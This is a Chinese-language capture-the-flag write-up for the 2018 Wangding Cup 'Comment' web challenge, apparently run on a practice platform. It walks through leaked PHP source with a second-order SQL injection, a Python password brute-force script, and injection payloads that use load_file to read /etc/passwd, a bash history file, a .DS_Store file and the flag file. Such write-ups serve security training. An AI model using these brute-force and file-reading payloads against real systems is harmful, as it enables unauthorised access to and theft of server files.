[网鼎杯 2018]Comment

### 知识点

  • git泄露
  • SQL二次注入
  • SQL文件读取
  • 特殊文件识别和利用

用githack将文件下载下来:

1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

可以存在明显的二次注入,从wrtie功能写入,在comment功能执行,category字段可以用来使用payload,可以构造如下格式的payload。

先访问登录页面login.php查看下。

2

注意到其中账户密码的默认填充字符,需要注意此处就是出题人给出的提示,账户为zhangwei密码为zhangwei***,其中的***为三位的未知字符串需要我们爆破。

这里先***测试为纯数字的情况。

1
2
3
4
5
6
7
8
9
10
11
import requests as res
import time
url="http://2b661b6a-7be0-408c-84e4-0aa48b856bee.node4.buuoj.cn:81/login.php"
def change(num):
        return ('0'*(3-len(str(num))))+str(num)

for num in range(648,1000):
        resp=res.post(url=url,data={"username":"zhangwei","password":"zhangwei{}".format(change(num))})
        print(change(num)+'=>'+str(len(resp.text)))
        time.sleep(0.3)

3

可以看到***的实际值为666,用得到的账户和密码进行登录,接下来就可以进行二次登录了。

先写入在写入功能写入payload,如下body部分中参数categorycontent=database()部分的database()可以替换为其他SQL查询语句或者函数,payload其余部分则可视为固定。

4

接着在评论功能触发二次注入,同样在此的payload也视为固定(注意项目的SQL语句为多行,所以需要#/**/配合使用)。

5

然后就能在对应的详情页面的留言部分查看到注入后的结果。

6

按照惯例去依次查找下库、表、字段。

1
2
title=test&category=test',content=(select(group_concat(schema_name))from(information_schema.schemata)),/*&content=test

7

1
title=test&category=test',content=(select(group_concat(table_name))from(information_schema.tables)where((table_schema)=(database()))),/*&content=test

8

但查到字段时就发现,无论在那个表都找不到flag相关的字段,这里尝试读取下文件是否可行。

1
title=test&category=test',content=((select(load_file("/etc/passwd")))),/*&content=test

9

成功了,并且可以发现WEB系统用户home目录竟然在/home下,尝试去读取下其操作记录。

1
title=test&category=test',content=((select(load_file("/home/www/.bash_history")))),/*&content=test

10

可以看到当前项由html.zip在原本/tmp目录下解压再复制到/var/www,并且记录了关于项目html文件结构的.DS_Store/tmp目录中仍存在一份,去读取这个文件了解下项目结构。

1
title=test&category=test',content=((select(load_file("/tmp/html/.DS_Store")))),/*&content=test

11

可能由于乱码问题所以无法完全读取,这里采用对其转成16进制。

1
title=test&category=test',content=((select(hex(load_file("/tmp/html/.DS_Store"))))),/*&content=test

12

可以将得到的16进制写入文件再用相关的.DS_Store文件解析器去解析,但是此处都没显示完全(可以看到16进制末尾是一串…),所以直接转换成ASCII字符来查看也是可行的。

13

可以识别出上图红框中文件与flag相关,去去读下,为了保险起见先尝试hex处理后的内容。

1
title=test&category=test',content=((select(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php")))),/*&content=test

14

15

找到flag。